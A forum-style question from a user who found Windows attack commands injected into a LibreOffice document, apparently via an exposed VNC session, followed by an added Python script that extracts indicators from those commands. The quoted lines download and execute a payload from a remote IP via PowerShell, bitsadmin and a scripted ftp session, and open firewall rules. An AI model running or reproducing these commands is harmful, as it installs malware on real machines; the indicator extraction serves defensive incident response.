I was AFK for a few hours. This is what I saw in my LibreOffice document when I returned to my laptop:
cmd.exe /c PoweExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://92.63.197.153/cawk.exe','%temp%\40006605040.exe');Start-Process '%temp%\40006605040.exe'
rcmd.exe /c bitsadmin /transfer getitman /download /priority high http://92.63.197.153/cawk.exe %temp%\4950606004.exe&start %temp%\4950606004.exe
rcmd.exe /c netsh firewall add allowedprogram C:\Windows\System32\ftp.exe "ok" ENABLE&netsh advfirewall firewall add rule name="ok" dir=in action=allow program="C:\Windows\System32\ftp.exe" enable=yes
rcmd.exe /c "cd %temp%&@echo open 92.63.197.153>>ftpget.txt&@echo tom>>ftpget.txt&@echo hehehe>>ftpget.txt&@echo binary>>ftpget.txt&@echo get cawk.exe>>ftpget.txt&@echo quit>>ftpget.txt&@ftp -s:ftpget.txt&@start cawk.exe"
I am on Linux Mint, so the commands (Windows; PowerShell?) were obviously not targeted individually against my system but rather came from a random attack. Still, I wonder how this could happen. I was connected to the VPN network of my university during that time (using Cisco AnyConnect). I also had VNC running with a rather mediocre password. This is my only guess. Do you have any ideas? Should I be worried that my system is infected?
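As an added, illustrative example (this is not part of the question and not an answer to it), the script below pulls out of the four injected command lines the indicators a responder would want to record and block: the remote host and URL the payload is fetched from, the file names that get written and executed, the program the netsh rules whitelist, and the FTP username and password embedded in the scripted ftp session. It also labels which download technique each line uses (PowerShell WebClient, bitsadmin, netsh firewall rule, ftp -s: script). The four command lines are copied from the question, with the curly quotes normalised to straight ones; the regexes, the technique labels and the Indicators structure are this example's own. It assumes that the leading "r" on three of the lines is a stray keystroke rather than part of the command (the intended command clearly begins with cmd.exe) and strips it before parsing.

```python
"""Extract indicators from keystroke-injected command lines.

Added example, not code from the original post. The four command lines are
copied from the post; the regexes, labels and the stray-'r' assumption are
this example's own.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# The command lines as pasted in the post (curly quotes normalised to straight ones).
INJECTED_COMMANDS = [
    r"cmd.exe /c PoweExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://92.63.197.153/cawk.exe','%temp%\40006605040.exe');Start-Process '%temp%\40006605040.exe'",
    r"rcmd.exe /c bitsadmin /transfer getitman /download /priority high http://92.63.197.153/cawk.exe %temp%\4950606004.exe&start %temp%\4950606004.exe",
    r'rcmd.exe /c netsh firewall add allowedprogram C:\Windows\System32\ftp.exe "ok" ENABLE&netsh advfirewall firewall add rule name="ok" dir=in action=allow program="C:\Windows\System32\ftp.exe" enable=yes',
    r'rcmd.exe /c "cd %temp%&@echo open 92.63.197.153>>ftpget.txt&@echo tom>>ftpget.txt&@echo hehehe>>ftpget.txt&@echo binary>>ftpget.txt&@echo get cawk.exe>>ftpget.txt&@echo quit>>ftpget.txt&@ftp -s:ftpget.txt&@start cawk.exe"',
]

# Assumption: a leading 'r' directly in front of 'cmd.exe' is a stray keystroke, not part of the command.
STRAY_PREFIX_RE = re.compile(r"^r(?=cmd\.exe\b)")

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s'\"&]+")
# Payload launched via PowerShell Start-Process '<path>' or cmd's start <path>.
EXEC_RE = re.compile(r"(?:Start-Process\s+'|\bstart\s+)([^'\"&]+)", re.IGNORECASE)
# Program whitelisted by the old netsh firewall syntax or the advfirewall syntax.
ALLOWED_RE = re.compile(r'allowedprogram\s+(\S+)|program="([^"]+)"', re.IGNORECASE)
# ftp -s: script built with echo: host, then username, then password, all appended to the same file.
FTP_SCRIPT_RE = re.compile(r"@echo open (\S+?)>>(\S+?)&@echo (\S+?)>>\2&@echo (\S+?)>>\2")

# Download/execution technique labels; the first matching pattern wins.
TECHNIQUES = [
    ("powershell_webclient", re.compile(r"System\.Net\.WebClient|DownloadFile\(", re.IGNORECASE)),
    ("bitsadmin_transfer", re.compile(r"\bbitsadmin\b.*?/transfer\b", re.IGNORECASE)),
    ("netsh_firewall_allow", re.compile(r"\bnetsh\b.*?\badd\s+(?:allowedprogram|rule)\b", re.IGNORECASE)),
    ("ftp_script_download", re.compile(r"\bftp\s+-s:", re.IGNORECASE)),
]


@dataclass
class Indicators:
    technique: str
    remote_hosts: set[str] = field(default_factory=set)
    urls: set[str] = field(default_factory=set)
    executed: set[str] = field(default_factory=set)
    whitelisted_programs: set[str] = field(default_factory=set)
    ftp_credentials: tuple[str, str] | None = None


def normalise(cmd: str) -> str:
    """Trim whitespace and drop the assumed stray leading 'r'."""
    return STRAY_PREFIX_RE.sub("", cmd.strip())


def classify(cmd: str) -> str:
    """Return the technique label for a command line, or 'unknown'."""
    for label, pattern in TECHNIQUES:
        if pattern.search(cmd):
            return label
    return "unknown"


def extract_indicators(cmd: str) -> Indicators:
    """Collect hosts, URLs, executed payloads, whitelisted programs and FTP creds."""
    cmd = normalise(cmd)
    ind = Indicators(technique=classify(cmd))
    ind.remote_hosts.update(IPV4_RE.findall(cmd))
    ind.urls.update(URL_RE.findall(cmd))
    ind.executed.update(m.group(1).strip() for m in EXEC_RE.finditer(cmd))
    for m in ALLOWED_RE.finditer(cmd):
        ind.whitelisted_programs.add(m.group(1) or m.group(2))
    m = FTP_SCRIPT_RE.search(cmd)
    if m:
        ind.ftp_credentials = (m.group(3), m.group(4))
    return ind


def summarise(cmds: list[str]) -> dict:
    """Merge indicators across all command lines into one blocklist-style summary."""
    results = [extract_indicators(c) for c in cmds]
    return {
        "techniques": [r.technique for r in results],
        "remote_hosts": set().union(*(r.remote_hosts for r in results)),
        "urls": set().union(*(r.urls for r in results)),
        "executed": set().union(*(r.executed for r in results)),
        "whitelisted_programs": set().union(*(r.whitelisted_programs for r in results)),
        "ftp_credentials": [r.ftp_credentials for r in results if r.ftp_credentials],
    }


if __name__ == "__main__":
    for key, value in summarise(INJECTED_COMMANDS).items():
        print(f"{key}: {value}")
```

All four lines resolve to the same host and the same payload name, so a single firewall block on 92.63.197.153 and a search for cawk.exe or the numeric %temp% names covers every variant; the netsh line is worth noting separately because it changes host firewall state rather than downloading anything.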